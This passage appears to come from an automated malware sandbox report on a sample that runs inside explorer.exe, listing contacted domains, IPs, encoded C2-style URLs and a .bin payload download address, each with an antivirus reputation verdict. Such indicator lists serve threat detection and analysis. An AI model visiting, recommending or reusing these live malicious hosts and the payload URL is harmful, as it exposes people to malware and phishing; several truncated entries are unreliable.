      http://www.ktrandnews.com/ro12/100%Avira URL Cloudmalware
      http://www.qualityquickprints.comReferer:0%Avira URL Cloudsafe
      http://www.niaeoer.com/ro12/www.shuraop.xyz100%Avira URL Cloudmalware
      http://www.ktrandnews.com/ro12/www.nala.dev100%Avira URL Cloudmalware
      http://www.senior-living-91799.bondReferer:0%Avira URL Cloudsafe
      http://www.ps212naming.com/ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      http://www.fathomtackle.com0%Avira URL Cloudsafe
      http://www.senior-living-91799.bond/ro12/www.riderarea.com100%Avira URL Cloudmalware
      http://www.justinmburns.com/ro12/100%Avira URL Cloudmalware
      http://www.qualityquickprints.com/ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      http://www.pwpholdings.com/ro12/www.justinmburns.com0%Avira URL Cloudsafe
      http://www.55dy5s.top/ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudphishing
      http://www.55dy5s.top/ro12/100%Avira URL Cloudphishing
      http://www.ddbetting.com/ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      http://www.55dy5s.top/ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo100%Avira URL Cloudphishing
      http://www.pwpholdings.com/ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKP0%Avira URL Cloudsafe
      http://www.rptiki.com/ro12/www.tiktok-shop-he.com100%Avira URL Cloudmalware
      https://word.office.comt.0%Avira URL Cloudsafe
      http://www.ps212naming.com100%Avira URL Cloudmalware
      http://www.shuraop.xyz/ro12/100%Avira URL Cloudphishing
      http://www.rptiki.com100%Avira URL Cloudphishing
      http://www.holzleisten24.shop/ro12/www.xlrj.asia100%Avira URL Cloudmalware
      http://www.easyeats307.com/ro12/www.doubleapus.com100%Avira URL Cloudmalware
      http://www.doubleapus.comReferer:0%Avira URL Cloudsafe
      http://www.senior-living-91799.bond0%Avira URL Cloudsafe
      http://www.digitalserviceact.online/ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      http://www.start399.com/ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      http://www.holzleisten24.shopReferer:0%Avira URL Cloudsafe
      http://www.xlrj.asia100%Avira URL Cloudphishing
      http://www.holzleisten24.shop/ro12/100%Avira URL Cloudmalware
      http://www.shuraop.xyz/ro12/www.qualityquickprints.com100%Avira URL Cloudphishing
      http://www.justinmburns.comReferer:0%Avira URL Cloudsafe
      https://outlook.comQJ0%Avira URL Cloudsafe
      http://www.fathomtackle.com/ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      http://www.niaeoer.com/ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      http://www.doubleapus.com0%Avira URL Cloudsafe
      http://103.72.68.128/pcd/wAYOlXAIjrMljL79.bin100%Avira URL Cloudmalware
      http://www.pwpholdings.com/ro12/0%Avira URL Cloudsafe
      http://www.senior-living-91799.bond/ro12/100%Avira URL Cloudmalware
      http://www.easyeats307.comReferer:0%Avira URL Cloudsafe
      http://ns.adobe.co0%Avira URL Cloudsafe
      http://www.start399.comReferer:0%Avira URL Cloudsafe
      http://www.tiktok-shop-he.com/ro12/100%Avira URL Cloudmalware
      http://www.digitalserviceact.online/ro12/www.ddbetting.com100%Avira URL Cloudmalware
      http://www.ktrandnews.com0%Avira URL Cloudsafe
      http://www.xlrj.asiaReferer:0%Avira URL Cloudsafe
      http://schemas.micro0%Avira URL Cloudsafe
      http://www.ddbetting.com/ro12/100%Avira URL Cloudmalware
      http://www.tiktok-shop-he.comReferer:0%Avira URL Cloudsafe
      https://cdn.queryF0%Avira URL Cloudsafe
      http://www.riderarea.com/ro12/www.shuraop.xyz100%Avira URL Cloudmalware
      http://www.rptiki.comReferer:0%Avira URL Cloudsafe
      http://www.riderarea.com0%Avira URL Cloudsafe
      http://www.shuraop.xyz/ro12/www.ktrandnews.com100%Avira URL Cloudphishing
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      http://www.digitalserviceact.online/ro12/100%Avira URL Cloudmalware
      http://www.doubleapus.com/ro12/www.holzleisten24.shop100%Avira URL Cloudmalware
      http://www.ddbetting.com0%Avira URL Cloudsafe
      http://www.tiktok-shop-he.com100%Avira URL Cloudmalware
      http://www.digitalserviceact.onlineReferer:0%Avira URL Cloudsafe
      http://www.digitalserviceact.online0%Avira URL Cloudsafe
      http://www.holzleisten24.shop0%Avira URL Cloudsafe
      http://www.xlrj.asia/ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      http://www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKP100%Avira URL Cloudmalware
      NameIPActiveMaliciousAntivirus DetectionReputation
      www.qualityquickprints.com
      3.64.163.50
      truetrue
        unknown
        www.ps212naming.com
        208.91.197.39
        truetrue
          unknown
          name.shoplazza.store
          104.18.233.42
          truetrue
            unknown
            www.holzleisten24.shop
            130.185.109.77
            truetrue
              unknown
              www.los3.online
              172.177.169.252
              truetrue
                unknown
                www.senior-living-91799.bond
                104.247.82.94
                truetrue
                  unknown
                  hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
                  18.119.154.66
                  truefalse
                    high
                    www.start399.com
                    91.195.240.123
                    truetrue
                      unknown
                      www.digitalserviceact.online
                      185.104.28.238
                      truetrue
                        unknown
                        www.nala.dev
                        38.242.133.61
                        truetrue
                          unknown
                          0826.93cu.com
                          154.12.93.8
                          truetrue
                            unknown
                            www.ktrandnews.com
                            158.247.235.89
                            truetrue
                              unknown
                              www.fathomtackle.com
                              154.197.227.142
                              truetrue
                                unknown
                                www.riderarea.com
                                52.20.84.62
                                truetrue
                                  unknown
                                  ddbetting.com
                                  15.197.142.173
                                  truetrue
                                    unknown
                                    www.55dy5s.top
                                    34.120.249.181
                                    truefalse
                                      unknown
                                      www.easyeats307.com
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.doubleapus.com
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.niaeoer.com
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.pwpholdings.com
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.justinmburns.com
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.xlrj.asia
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.ddbetting.com
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://www.riderarea.com/ro12/?3fY=-ZkX&pR-=LGYu0+ofLQhP7724nJ/BQ1gFrbGvfVPqmQuS2LiwheVAxFjzT3VG9Q3bfEwRvtUKPFG/true
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.ps212naming.com/ro12/?pR-=rtUgTuNL7uL+LGGSpkT0QUDqa6bNuU9c/oVzs0vN/XeiV6RFY6H23yk7imnqF7CC5MmR&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.qualityquickprints.com/ro12/?pR-=uQgh28/mwUTAreWLWMvWctCpaYYKSPk/RTU2hG/2GkXh2eCF81faGnz4QbuRWtjyYx7X&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.55dy5s.top/ro12/?pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXo&Wx=ChSLGhh0Mn9TylKPfalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://www.ddbetting.com/ro12/?pR-=hMzxxbkXjK5UhHFUVKKzsXjiG5SdjoCmZm0mRTZiy05C1nCrhTC2iqR8bXRfdiWJf26x&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.pwpholdings.com/ro12/?pR-=uAil5XdBoZ+2CkbxeHQt0E2a6PqX6RKuOQ+ejqYxtKGY7TwYTqnnbJE3/J+NrU/b1JZc&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.55dy5s.top/ro12/?3fY=-ZkX&pR-=YIi7nDQw6o4IM6Y7GVEqMnWSon2sCGETt9fQ5s5Vu4Y8lCbsapzjTWOCPxSAe4pqXmXofalse
                                                    • Avira URL Cloud: phishing
                                                    unknown
                                                    http://www.digitalserviceact.online/ro12/?pR-=4oHDpgyPUiJGP23m0SdAgh/yfEH8JJ8nkAUqpp/b29PXB/3TZ/gO5/kpv5F7QImaAVTW&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.start399.com/ro12/?pR-=GwGtW18azFWuCI/cWsMSGkvtLVgXrxrAejaoI1gQoBI/O/ZzRnUmOmWdpT96riJEH3vd&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.fathomtackle.com/ro12/?pR-=gzgOk9L9AfWHfN0tCkhRIi8dk8p3PFyiDnwZelvp2AG1WsshoUlVSypZKzCbkCaQBejH&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.niaeoer.com/ro12/?pR-=dJqi3gPkjgABca74pxnHJ2flNeCuOiIkF0IIcqv13LRvEaAIYFadFLyq9bv/k+1Q0EDq&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://103.72.68.128/pcd/wAYOlXAIjrMljL79.bintrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.holzleisten24.shop/ro12/?pR-=YvLwEHT7dF3wqOWcBoJhBcwDYJ3uuNfwUzugM5jE2WtwH9yjz4WpnbfVNhN3mQxE4RMu&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.xlrj.asia/ro12/?pR-=0LOFVeHqsrMeo4L+dmJBR/0B/c0sqVoEg1WVw/8t1mjD3B4IGyZiGj+5uErL3J0wPr7A&Wx=ChSLGhh0Mn9TylKPtrue
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://www.los3.online/ro12/explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.ps212naming.comReferer:explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.doubleapus.com/ro12/explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.nala.dev/ro12/explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.pwpholdings.comReferer:explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://www.xlrj.asia/ro12/www.fathomtackle.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: malware
                                                    unknown
                                                    http://www.pwpholdings.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://www.msn.com/en-us/news/politics/house-gop-picks-steve-scalise-as-speaker-nominee-but-unclearexplorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      high
                                                      https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRIg-darkexplorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.los3.online/ro12/www.start399.comexplorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          unknown
                                                          https://th.bing.explorer.exe, 00000004.00000000.9902197549.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11264501949.000000000D1A0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14578477014.000000000D1A0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://excel.office.comexplorer.exe, 00000004.00000002.14579257959.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12111240915.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11270980029.000000000D30B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDMaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000626000.00000020.00000001.01000000.00000006.sdmpfalse
                                                              high
                                                              http://www.nala.dev/ro12/www.rptiki.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.gopher.ftp://ftp.MaMsKRmgXZ.exe, 00000002.00000001.9728969517.0000000000649000.00000020.00000001.01000000.00000006.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.ktrandnews.com/ro12/explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.fathomtackle.com/ro12/www.digitalserviceact.onlineexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.niaeoer.com/ro12/www.shuraop.xyzexplorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              http://www.senior-living-91799.bondReferer:explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.qualityquickprints.comReferer:explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.ktrandnews.com/ro12/www.nala.devexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gRIgexplorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.fathomtackle.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://word.office.comexplorer.exe, 00000004.00000000.9902197549.000000000CE47000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14576881586.000000000CE47000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.justinmburns.com/ro12/explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://www.senior-living-91799.bond/ro12/www.riderarea.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://www.55dy5s.top/ro12/explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: phishing
                                                                  unknown
                                                                  http://www.pwpholdings.com/ro12/www.justinmburns.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://www.rptiki.com/ro12/www.tiktok-shop-he.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  unknown
                                                                  http://nsis.sf.net/NSIS_ErrorErrorMaMsKRmgXZ.exe, 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000000.00000000.9467778286.0000000000409000.00000008.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000002.00000000.9724749786.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                    high
                                                                    http://www.holzleisten24.shop/ro12/www.xlrj.asiaexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://word.office.comt.explorer.exe, 00000004.00000002.14579257959.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12111240915.000000000D30D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11270980029.000000000D30B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.shuraop.xyz/ro12/explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: phishing
                                                                    unknown
                                                                    https://api.msn.com/-explorer.exe, 00000004.00000000.9897491783.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12109712536.000000000974E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.000000000974E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.ps212naming.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.easyeats307.com/ro12/www.doubleapus.comexplorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: malware
                                                                      unknown
                                                                      http://www.rptiki.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: phishing
                                                                      unknown
                                                                      http://nsis.sf.net/NSIS_ErrorMaMsKRmgXZ.exe, MaMsKRmgXZ.exe, 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000000.00000000.9467778286.0000000000409000.00000008.00000001.01000000.00000003.sdmp, MaMsKRmgXZ.exe, 00000002.00000000.9724749786.0000000000409000.00000008.00000001.01000000.00000003.sdmpfalse
                                                                        high
                                                                        http://www.senior-living-91799.bondexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://www.msn.com/en-us/news/politics/sen-mitt-romney-urged-democratic-senators-to-challenge-bidenexplorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.doubleapus.comReferer:explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          https://android.notify.windows.com/iOSexplorer.exe, 00000004.00000003.11271243917.000000000D34B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12110546244.000000000D34D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14579496985.000000000D34C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11265701285.000000000D33D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.msn.com/en-us/money/markets/europe-gives-mark-zuckerberg-24-hours-to-respond-about-israeexplorer.exe, 00000004.00000003.11264501949.000000000D1CB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9902197549.000000000D1CB000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.holzleisten24.shopReferer:explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://android.notify.windows.com/iOS14explorer.exe, 00000004.00000003.11271243917.000000000D34B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.12110546244.000000000D34D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14579496985.000000000D34C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11265701285.000000000D33D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.holzleisten24.shop/ro12/explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: malware
                                                                                unknown
                                                                                http://www.xlrj.asiaexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: phishing
                                                                                unknown
                                                                                http://www.justinmburns.comReferer:explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://www.shuraop.xyz/ro12/www.qualityquickprints.comexplorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: phishing
                                                                                  unknown
                                                                                  https://outlook.comQJexplorer.exe, 00000004.00000003.12109712536.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14570643138.00000000096B4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.9897491783.00000000096B4000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.doubleapus.comexplorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.pwpholdings.com/ro12/explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.senior-living-91799.bond/ro12/explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: malware
                                                                                  unknown
                                                                                  http://ns.adobe.coexplorer.exe, 00000004.00000000.9894494720.00000000046F6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.14565697362.00000000046F6000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://www.start399.comReferer:explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://img.sedoparking.comexplorer.exe, 00000004.00000002.14584974938.00000000142DF000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.digitalserviceact.online/ro12/www.ddbetting.comexplorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
                                                                                    http://www.easyeats307.comReferer:explorer.exe, 00000004.00000003.11262553853.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    http://www.tiktok-shop-he.com/ro12/explorer.exe, 00000004.00000002.14580377948.000000000D4B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: malware
                                                                                    unknown
